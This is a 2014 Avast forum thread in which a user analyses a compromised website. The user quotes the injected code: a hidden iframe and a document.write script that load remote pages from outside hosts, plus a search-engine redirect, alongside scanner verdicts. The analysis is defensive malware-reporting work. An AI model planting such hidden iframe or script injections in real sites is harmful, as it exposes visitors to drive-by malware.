Avast community forum
Home
Help
Search
Login
Register
Avast WEBforum
»
Other
»
Viruses and worms
(Moderators:
Maxx_original
,
misak
) »
Hidden iFrame destination down? Sedoparking malware threat?
« previous
next »
Print
Pages: [
1
]
Go Down
Author
Topic: Hidden iFrame destination down? Sedoparking malware threat? (Read 2243 times)
0 Members and 1 Guest are viewing this topic.
polonus
Avast Überevangelist
Probably Bot
Posts: 34051
malware fighter
Hidden iFrame destination down? Sedoparking malware threat?
«
on:
March 19, 2014, 07:09:20 PM »
See:
http://killmalware.com/montederramo.com/#
Google Safebrowsing flags site:
http://www.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Fmontederramo.com%2F&hl=en
Server redirect status on redirect url: Code: 404, Content cannot be read!
Site infested with malware and blacklisted:
http://sitecheck.sucuri.net/scanner/?scan=http%3A%2F%2Fmontederramo.com%2F
iFrame check on main site: Suspicious
<iframe src="htxp://clear-management dot fr/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px"
Injection check: Suspicious Text after HTML
<iframe src="htxp://clear-management.fr/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>
Included scripts check:Suspect - please check list for unknown includes
Suspicious Script:
montederramo.com/pphlogger.js
document.write("<script language=\"javascript\" type=\"text/javascript\" src=\"htxp://www.keylantracker.com/counter/pphlogger.php"+r+"\"></s
status OK with risk-> wXw.keylantracker dot com,82.98.86.165,ns2 dot sedoparking dot com,Parked/expired,
Infected by sedoparking ->
http://www.spywareinfoforum.com/topic/134136-infected-with-sedoparking/
post author = bullrush
Three general security warnings here:
https://asafaweb.com/Scan?Url=montederramo.com
polonus
«
Last Edit: March 19, 2014, 07:15:17 PM by polonus
»
Logged
Cybersecurity is more of an attitude than anything else. Avast Evangelists.
Use NoScript, a limited user account and a virtual machine and be safe(r)!
polonus
Avast Überevangelist
Probably Bot
Posts: 34051
malware fighter
Re: Hidden iFrame destination down? Sedoparking malware threat?
«
Reply #1 on:
March 19, 2014, 07:41:22 PM »
SE visitors redirects
Visitors from search engines are redirected
to: htxp://klaratsetkin.info/0/go.php?sid=3
klaratsetkin.info is reported by Google as suspicious
9 sites infected with redirects to this URL as is
http://killmalware.com/semrus.org/#
See:
http://urlquery.net/report.php?id=1395254486754
Nothing here:
https://www.virustotal.com/nl/url/f434dcd3e11c2f5ff0c1ff7bc70c48ec731a87dff575d9304a0a73020357fc10/analysis/
Quttera flags:
index
Severity: Suspicious
Reason: Detected suspicious redirection to external web resources at HTTP level. [What's this?]
Details: Detected HTTP redirection to htxp://klaratsetkin.info/0/go.php?sid=3. ->
http://evuln.com/labs/klaratsetkin.info/
File size[byte]: 18446744073709551615
File type: Unknown
MD5: 00000000000000000000000000000000
Scan duration[sec]: 0.001000
polonus
Logged
Cybersecurity is more of an attitude than anything else. Avast Evangelists.
Use NoScript, a limited user account and a virtual machine and be safe(r)!
Print
Pages: [
1
]
Go Up
« previous
next »
Avast WEBforum
»
Other
»
Viruses and worms
(Moderators:
Maxx_original
,
misak
) »
Hidden iFrame destination down? Sedoparking malware threat?